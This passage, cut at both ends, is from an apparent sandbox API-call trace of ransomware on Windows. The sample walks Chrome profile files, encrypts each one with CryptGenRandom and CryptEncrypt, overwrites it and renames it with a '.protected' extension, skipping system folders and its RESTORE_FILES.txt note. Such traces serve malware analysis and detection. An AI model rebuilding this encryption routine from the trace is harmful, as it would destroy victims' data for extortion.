lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.218] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.218] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.219] SetFilePointerEx (in: 
hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.219] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.219] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.220] CloseHandle (hObject=0x154) returned 1 [0084.221] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.protected") returned 100 [0084.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data.protected")) returned 1 [0084.222] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="Windows") returned -1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="Program Files") returned -1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="Program Files (x86)") returned -1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="$Recycle.bin") returned 1 [0084.222] lstrcmpiW (lpString1="Login Data-journal", lpString2="System Volume Information") returned -1 [0084.222] wnsprintfW (in: 
pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.222] StrStrIW (lpFirst="Login Data-journal", lpSrch=".protected") returned 0x0 [0084.222] lstrcmpW (lpString1="Login Data-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.222] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.223] StrStrW (lpFirst="Login Data-journal", lpSrch=".txt") returned 0x0 [0084.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.223] StrStrW (lpFirst="Login Data-journal", lpSrch=".rar") returned 0x0 [0084.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 98 [0084.223] StrStrW (lpFirst="Login Data-journal", lpSrch=".zip") returned 0x0 [0084.223] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.223] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.223] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.224] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.224] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.225] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.225] CloseHandle (hObject=0x154) returned 1 [0084.225] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal.protected") returned 108 [0084.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal.protected")) returned 1 [0084.226] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) 
returned 1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="Windows") returned -1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="Program Files") returned -1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="Program Files (x86)") returned -1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="$Recycle.bin") returned 1 [0084.226] lstrcmpiW (lpString1="Network Action Predictor", lpString2="System Volume Information") returned -1 [0084.226] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.226] StrStrIW (lpFirst="Network Action Predictor", lpSrch=".protected") returned 0x0 [0084.227] lstrcmpW (lpString1="Network Action Predictor", lpString2="RESTORE_FILES.txt") returned -1 [0084.227] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.227] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.227] StrStrW (lpFirst="Network Action Predictor", lpSrch=".txt") returned 0x0 [0084.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.227] StrStrW (lpFirst="Network Action Predictor", lpSrch=".rar") returned 0x0 [0084.227] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor") returned 104 [0084.227] StrStrW (lpFirst="Network Action Predictor", lpSrch=".zip") returned 0x0 [0084.227] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.233] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.233] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.233] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.234] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.234] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.234] CloseHandle (hObject=0x154) returned 1 [0084.234] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.protected") returned 114 [0084.234] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor.protected")) returned 1 [0084.235] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="Windows") returned -1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="Program Files") returned -1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="Program Files (x86)") returned -1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="$Recycle.bin") returned 1 [0084.235] lstrcmpiW (lpString1="Network Action Predictor-journal", lpString2="System Volume Information") returned -1 [0084.235] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.235] StrStrIW (lpFirst="Network Action Predictor-journal", lpSrch=".protected") returned 0x0 [0084.235] lstrcmpW (lpString1="Network Action Predictor-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.235] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.235] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.236] StrStrW (lpFirst="Network Action Predictor-journal", lpSrch=".txt") returned 0x0 [0084.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.236] StrStrW (lpFirst="Network Action Predictor-journal", lpSrch=".rar") returned 0x0 [0084.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 112 [0084.236] StrStrW (lpFirst="Network Action Predictor-journal", lpSrch=".zip") returned 0x0 [0084.236] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.236] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.236] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.236] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.236] 
WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.237] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.237] CloseHandle (hObject=0x154) returned 1 [0084.238] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.protected") returned 122 [0084.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network action predictor-journal.protected")) returned 1 [0084.238] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="Windows") returned -1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="Program Files") returned -1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="Program Files (x86)") returned -1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="$Recycle.bin") returned 1 [0084.238] lstrcmpiW (lpString1="Network Persistent State", lpString2="System Volume Information") returned -1 [0084.238] 
wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.238] StrStrIW (lpFirst="Network Persistent State", lpSrch=".protected") returned 0x0 [0084.239] lstrcmpW (lpString1="Network Persistent State", lpString2="RESTORE_FILES.txt") returned -1 [0084.239] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.239] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.239] StrStrW (lpFirst="Network Persistent State", lpSrch=".txt") returned 0x0 [0084.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.239] StrStrW (lpFirst="Network Persistent State", lpSrch=".rar") returned 0x0 [0084.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State") returned 104 [0084.239] StrStrW (lpFirst="Network Persistent State", lpSrch=".zip") returned 0x0 [0084.239] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0084.240] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.240] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x28, lpOverlapped=0x0) returned 1 [0084.241] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.241] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.241] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.241] CloseHandle (hObject=0x154) returned 1 [0084.241] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.protected") returned 114 [0084.241] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent state"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network Persistent State.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\network persistent 
state.protected")) returned 1 [0084.242] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="Windows") returned -1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="Program Files") returned -1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="Program Files (x86)") returned -1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="$Recycle.bin") returned 1 [0084.242] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="System Volume Information") returned -1 [0084.242] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.242] StrStrIW (lpFirst="Origin Bound Certs", lpSrch=".protected") returned 0x0 [0084.242] lstrcmpW (lpString1="Origin Bound Certs", lpString2="RESTORE_FILES.txt") returned -1 [0084.242] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.242] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.242] StrStrW (lpFirst="Origin Bound Certs", lpSrch=".txt") returned 
0x0 [0084.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.243] StrStrW (lpFirst="Origin Bound Certs", lpSrch=".rar") returned 0x0 [0084.243] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0084.243] StrStrW (lpFirst="Origin Bound Certs", lpSrch=".zip") returned 0x0 [0084.243] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1400, lpOverlapped=0x0) returned 1 [0084.246] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.246] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1400, lpOverlapped=0x0) returned 1 [0084.247] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.247] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.247] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.247] CloseHandle (hObject=0x154) returned 1 [0084.247] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.protected") returned 108 
[0084.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs.protected")) returned 1 [0084.248] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="Windows") returned -1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="Program Files") returned -1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="Program Files (x86)") returned -1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="$Recycle.bin") returned 1 [0084.248] lstrcmpiW (lpString1="Origin Bound Certs-journal", lpString2="System Volume Information") returned -1 [0084.248] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0084.248] StrStrIW (lpFirst="Origin Bound Certs-journal", lpSrch=".protected") returned 0x0 [0084.248] lstrcmpW (lpString1="Origin Bound Certs-journal", lpString2="RESTORE_FILES.txt") returned -1 [0084.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.248] CryptEncrypt (in: hKey=0x444cf8, 